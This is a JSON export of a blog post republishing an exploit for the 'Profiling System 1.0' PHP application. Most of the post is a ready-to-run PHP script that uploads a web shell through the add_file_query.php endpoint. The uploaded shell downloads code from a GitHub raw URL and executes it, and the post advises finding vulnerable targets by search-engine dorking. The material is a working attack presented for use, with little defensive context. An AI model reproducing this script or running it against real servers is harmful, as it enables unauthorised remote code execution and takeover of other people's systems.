{"id":59615,"date":"2024-09-11T19:59:54","date_gmt":"2024-09-11T16:59:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181447\/ps10-shell.txt"},"modified":"2024-09-11T19:59:54","modified_gmt":"2024-09-11T16:59:54","slug":"profiling-system-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/profiling-system-1-0-shell-upload\/","title":{"rendered":"Profiling System 1.0 Shell Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Profiling System 1.0 code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |<br \/>| # Vendor : https:\/\/www.sourcecodester.com\/php\/11222\/profiling-system-human-resource-management.html |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n<p>[+] Dorking In Google Or Other Search Engine.<\/p>\n<p>[+] This payload injects php code of your choice into an SHELL.php file. <\/p>\n<p>[+] Line 26<br \/>Line 35<\/p>\n<p>[+] change the path of the script folder.<\/p>\n<p>[+] save payload as poc.php<\/p>\n<p>[+] usage from cmd : C:\\www\\test&gt;php 1.php 127.0.0.1<\/p>\n<p>[+] payload : <\/p>\n<p>&lt;?php<\/p>\n<p>function file_upload($target_ip) {<br \/>$file_name = &#8220;indoushka.php&#8221;;<br \/>$webshell_payload = &#8220;&lt;?php<br \/>\\$url = &#8216;https:\/\/raw.githubusercontent.com\/indoushka\/txt\/main\/indoushka.txt&#8217;;<br \/>\\$ch = curl_init();<br \/>curl_setopt(\\$ch, CURLOPT_URL, \\$url);<br \/>curl_setopt(\\$ch, CURLOPT_RETURNTRANSFER, true);<br \/>\\$output = curl_exec(\\$ch);<br \/>curl_close(\\$ch);<br \/>if (\\$output) {<br \/>include &#8216;data:\/\/text\/plain;base64,&#8217; . 
base64_encode(\\$output);<br \/>}<br \/>?&gt;&#8221;;<\/p>\n<p>$post_fields = array(<br \/>&#8216;upload&#8217; =&gt; &#8221;,<br \/>&#8216;per_file&#8217; =&gt; new CURLFile(&#8216;data:\/\/text\/plain;base64,&#8217; . base64_encode($webshell_payload), &#8216;application\/x-php&#8217;, $file_name),<br \/>&#8216;per_name&#8217; =&gt; &#8216;inouva&#8217;,<br \/>&#8216;file_name&#8217; =&gt; &#8216;123&#8217;,<br \/>&#8216;qty&#8217; =&gt; &#8216;1&#8217;<br \/>);<\/p>\n<p>$ch = curl_init();<br \/>curl_setopt($ch, CURLOPT_URL, &#8220;http:\/\/$target_ip\/ProfilingSystem\/add_file_query.php&#8221;);<br \/>curl_setopt($ch, CURLOPT_POST, 1);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<\/p>\n<p>$response = curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;(+) Shell uploaded successfully.\\n&#8221;;<br \/>echo &#8220;(+) Access the shell at: http:\/\/$target_ip\/ProfilingSystem\/uploads\/$file_name\\n&#8221;;<br \/>}<\/p>\n<p>if ($argc != 2) {<br \/>echo &#8220;(+) Usage: php &#8221; . $argv[0] . &#8221; &lt;target ip&gt;\\n&#8221;;<br \/>echo &#8220;(+) Example: php &#8221; . $argv[0] . &#8221; 10.0.0.1\\n&#8221;;<br \/>exit(-1);<br \/>}<\/p>\n<p>$target_ip = $argv[1];<br \/>file_upload($target_ip);<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. 
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Profiling System 1.0 code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/php\/11222\/profiling-system-human-resource-management.html |============================================================================================================================================= poc : [+] Dorking In Google Or Other Search Engine. [+] This payload injects php code of your &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59615","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59615","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59615"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59615\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59615"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-js
on\/wp\/v2\/categories?post=59615"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59615"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}